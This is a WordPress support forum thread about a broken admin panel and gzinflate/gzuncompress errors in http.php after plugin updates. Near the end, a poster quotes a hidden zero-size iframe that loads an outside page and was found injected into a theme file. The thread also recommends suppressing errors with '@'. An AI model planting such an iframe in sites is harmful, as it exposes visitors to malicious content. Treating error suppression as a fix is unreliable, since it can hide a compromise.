• I auto updated two plug-ins and that caused data error in the http.php
    on two lines:

    1788: $decompressed = gzinflate( $compressed );
    1793: $decompressed = gzuncompress( $compressed );

    This in turn causes the entire admin panel to appear messed up, a bit like if you deleted a few div end tags or half the style sheet.

    At first I thought the issue might be from wp-stats but it could also be because of auto updating All in One SEO Pack.

    Warning: gzinflate() [function.gzinflate]: data error in //vitalbodies.com/blog/wp-includes/http.php on line 1788
    
    Warning: gzuncompress() [function.gzuncompress]: data error in vitalbodies.com/blog/wp-includes/http.php on line 1793

    I deleted, downloaded and FTP/reinstalled the 1.5 stats plug-in and that did not help.
    One thing I did notice is that the final message during the initial upgrade when this problem all began, that (I think) tells you the plug-in is re-initialized, was not the correct font or perhaps font size. Just seeing that I thought, oh no…

    Going back to 1.4 fixed the stats problem but the dashboard is still blown out.

    Disabling or enabling the two programs that use the dashboard does not help and disabling the SEO program did not help.

    The dashboard and the entire admin panel are still blown out? Any ideas, should I grab a http.php from elsewhere and overwrite it or?
    I am new to troubleshooting wordpress…

    I had posted to another thread but I realized I should start a new thread as that persons thread might or might no be related to this issue.

Viewing 10 replies - 1 through 10 (of 10 total)
  • Thread Starter vitalbodies

    (@vitalbodies)

    Well, grabbing another http.php from my other blog did not help so I restored the original. What would be the navigation on the left goes clear across the whole view port forcing everything else below that like stats, if you on the stats page, or edit post if your on that page or so on…

    Thread Starter vitalbodies

    (@vitalbodies)

    I thought I had tried this, but I deactivated All in One SEO Pack and the control panel is back to normal.

    Thread Starter vitalbodies

    (@vitalbodies)

    Updating to wp-stats 1.5 causes errors but does not blow out the admin.
    I had to down grade to 1.4 again.

    These plugins are simply relying on a new API available in WordPress, the stuff in http.php. It looks to me like you are seeing the effects of a bug in that new WordPress code or a misconfigured server.

    I would try turning off display_errors in your php.ini, or else modify those two lines by putting “@” before the dollar signs, which will suppress errors on those lines.

    You could report this bug by creating a ticket on core.trac.www.remarpro.com.

    None of this is working for me

    Thread Starter vitalbodies

    (@vitalbodies)

    Thanks Andy for taking the time to write.

    …So many people.

    I do not really want to suppress the errors at this point. And have not had time for the bug report as I was away on a trip. I did the latest WP upgrade and no luck.

    Thread Starter vitalbodies

    (@vitalbodies)

    What about malware like this:
    <iframe src="https://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

    Could this be the problem?

    Note: Malware can cause problems and compromise your computer or website.

    Thread Starter vitalbodies

    (@vitalbodies)

    This type of virus seems to be added to themes at the very least. Not by the theme people but some other way. I removed the code from the index.php in the theme directory of my current theme and the errors went away at least for now.

    I am getting this on all my 8 sites and it seem to affect the admin area only. I copied a fresh copy of the http.php file to one of my site and it fixed the look but when I try to edit a page, I do not get all the stuff to edit it. It acts as if it gets into the HTML look and will not go into the visual look. This really put me in a bind as I can not do some of my needed changes to the sites. All plugin have been disabled and it still happens. I refreshed the theme and still nothing clears up. I do get the same two errors when I go into the plugin view. The other sites that I have not copied the http.php file too, I get the admin screens as if there is not html or php code behind it.

    Need help very soon.

    I was having this very same problem and put “@” before the dollar signs which fixed everything. Thanks so much!

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘Admin panel messed up and data errors related to http.php’ is closed to new replies.